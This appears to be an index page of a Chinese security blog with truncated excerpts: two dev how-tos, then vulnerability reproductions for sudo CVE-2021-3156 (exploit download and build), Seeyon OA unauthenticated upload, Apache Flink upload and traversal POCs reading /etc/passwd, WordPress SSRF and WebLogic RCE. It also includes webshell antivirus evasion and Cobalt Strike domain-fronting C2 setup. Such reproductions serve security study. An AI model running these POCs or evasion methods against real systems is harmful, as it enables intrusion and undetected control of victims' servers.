Celery在DJANGO中的简单使用
Celery 简介 除了redis,还可以使用另外一个神器—Celery。Celery是一个异步任务的调度工具。
Celery 是 Distributed Task Queue,分布式任务队列,分布式决定了可以有多个 worker 的存在,队列表示其是异步操作,即存在一个产生任务提出需求的工头,和一群等着被分配工作的码农。
在 Python 中定义 Celery 的时候,我们要引入 Broker,中文翻译过来就是“中间人”的意思,在这里 Broker 起到一个中间人的角色。在工头提出任务的时候,把所有的任务放到 Broker 里面,在 Broker 的另外一头,一群码农等着取出一个个任务准备着手做。
这种模式注定了整个系统会是个开环系统,工头对于码农们把任务做的怎样是不知情的。所以我们要引入 Backend 来保存每次任务的结果。这个 Backend 有点像我们的 Broker,也是存储任务的信息用的,只不过这里存的是那些任务的返回结果。我们可以选择只让错误执行的任务返回结果到 Backend,这样我们取回结果,便可以知道有多少任务执行失败了。
Celery(芹菜 ...
Docker快速搭建Oracle服务,导入dmp文件
Docker快速搭建Oracle服务,导入dmp文件代码审计遇到oracle数据库,记录一下如何快速的搭建,然后导入dmp数据库备份文件
0x01 前置环境
macos
Docker
0x02 搭建Oracle服务1、拉取Oracle镜像
1docker pull registry.cn-hangzhou.aliyuncs.com/helowin/oracle_11g
2、运行镜像
1docker run -p 1521:1521 --name oracle_11g --restart=always -v /Users/zy/Desktop/logs:/home/oracle/app/oracle/oradata/mydata registry.cn-hangzhou.aliyuncs.com/helowin/oracle_11g
123456-v /Users/zy/Desktop/logs:/home/oracle/app/oracle/oradata/mydata前面/Users/zy/Desktop/logs 是物理机器的路径/home/oracle/app/or ...
Linux sudo 提权漏洞 CVE-2021-3156 复现 附exp
0x01 CVE-2021-3156: 缓冲区溢出漏洞在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。
0x02 影响版本Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
不受影响版本
Sudo =>1.9.5p2
0x03 漏洞检测测试环境:ubuntu:20.04
检测是否存在
1sudoedit -s /
如下以sudoedit:开头报错则存在此漏洞
如果响应一个以usage:开头的报错,那么表明补丁已经生效
0x04 漏洞复现exp当前用户为普通用户
下载EXP
1git clone https://github.com/blasty/CVE-2021-3156.git
进入编译一下
1234567$ makerm -rf libnss_Xmkdir libnss_Xgcc -std=c99 -o sudo-hax-me-a-sandwic ...
某OA ajax.do 未授权漏洞任意文件上传getshell复现
某OA ajax.do 未授权漏洞任意文件上传getshell复现0x00 简介某OA A8 是一款流行的协同管理软件,在各中、大型企业机构中广泛使用。
由于某旧版本某些接口能被未授权访问,并且部分函数存在过滤不足,攻击者通过构造恶意请求,权限绕过漏洞,可在无需登录的情况下上传恶意脚本文件,从而控制服务器
0x01 影响范围某OA V8.0某OA V7.1、V7.1SP1某OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3某OA V6.0、V6.1SP1、V6.1SP2某OA V5.x
0x02:漏洞复现一、首先测试漏洞环境是否存在POC验证漏洞存在否
1127.0.0.1:8002/seeyon/thirdpartyController.do.css/..;/ajax.do
利用PAYLOAD
1234567891011121314151617POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress ...
CVE-2020-17518 任意文件写漏洞复现
0x01 漏洞简介Apache FlinkApache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
CVE-2020-17518 任意文件写漏洞Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。
Apache Flink 控制面板的Submit New Job处存在任意文件上传:
0x02 影响版本1231.11.01.11.11.11.2
0x03 漏洞复现
写入EXP:
123456789101112131415POST /jars/upload HTTP/1.1Host: 127.0.0.1:8081Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: clo ...
漏洞复现 Apache Flink CVE-2020-17519 任意文件读取漏洞
0x01 漏洞简介Apache FlinkApache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
CVE-2020-17519 任意文件读取漏洞Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。
该项更新允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件
0x02 影响版本1231.11.01.11.11.11.2
0x03 漏洞复现
POC:
12http://127.0.0.1/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
0x05 修复建议所有用户升级最新版
1https://flink.apache.org/downloads.html
webshell多种方法免杀
0x00 前提
-2020 最后一天了,这个月其实没有完整的写完东西,这是以前的存货了,应为生病了,真的的难受的不行,什么也干不了,天天站不行坐不行,躺着也不行了。。。哎。。。总之身体真的很重要,别搞坏了身体!!!
webshell这个东西对于web方向的还是极其重要的,getshell被杀了很难受,于是来研究一波自己的免杀马儿,毕竟别人没有自己的好用,而且分享出来分分钟被杀。
在本篇文章中将会介绍一些常用的木马免杀技巧
0x01 检测情况
WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马。
当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础
查杀软件我首先:D盾
『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
0x02 PHP一句话这次主要是对php的一句话免杀实验
首 ...
WordPress xmlrpc.php SSRF漏洞复现
0x01 WordPress xmlrpc.php 存在SSRF漏洞通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
0x02 影响版本WordPress 版本< 3.5.1
造成的影响1、可以对业务内网进行探测。2、攻击运行在内网或本地的应用程序(比如溢出攻击)。3、利用file协议读取本地文件等
0x03漏洞验证第一步:直接访问这个文件,初步判断
第二步:发现POC验证数据包
需要修改三处地方:例如:www.baidu.com
123Host: www.baidu.com<param><value><string>DNSLOG地址</string></value></param><param><value><string>http://www.baidu.com/?p=1</string></value></param>
完整验证数据包
123 ...
Weblogic(CVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
Weblogic(CVE-2020-14882,CVE-2020-14883) 管理控制台未授权远程命令执行漏洞0x01 漏洞简述2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883 ,漏洞等级:严重,漏洞评分:9.8。
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。
0x02 影响版本Oracle:Weblogic:
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
0x03 漏洞详情CVE-2020-14883: 权限绕过漏洞远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console。
权限绕过漏洞(CVE-2020-14882),访问以下URL,未授权访问到管理后台页面(低权限的用户):
1http ...
CS通过(CDN+证书)powershell上线详细版
0x00 简介这个应该叫做域前置技术:
大致图示:
攻击流量通过CDN节点将流量转发到真实的C2服务器
CDN节点ip通过识别请求的Host头进行流量转
可以有效的躲避一些安全设备,也有这一定的反溯源功能,因为流量都去了CDN上
之前看了一些文章,但是大佬有些地方觉得简单肯能就没写,自己搭建的时候就写了一些,算是我的一个笔记吧,感觉较为详细了,比较适合新手。
0x01 需要资源
cobaltstrike 4.0
VPS(cs服务器)
域名
CDN
国外代理
0x02 域名免费申请申请地址:https://www.freenom.com/
重点是免费且不用备案的
自行选择申请免费的域名
注意:要挂代理,然后把个人信息的地址设置成代理的地址,要不可能申请不成功
0x03 免费CDN准备申请地址:https://dash.cloudflare.com/
自行注册并登录设置CDN
0x04 域名和CDN联动设置登陆CDN,添加站点为刚刚申请的域名
添加A记录,指向VPS的IP地址
1234类型 名称 内容 TTL 代理状态 A test 10 ...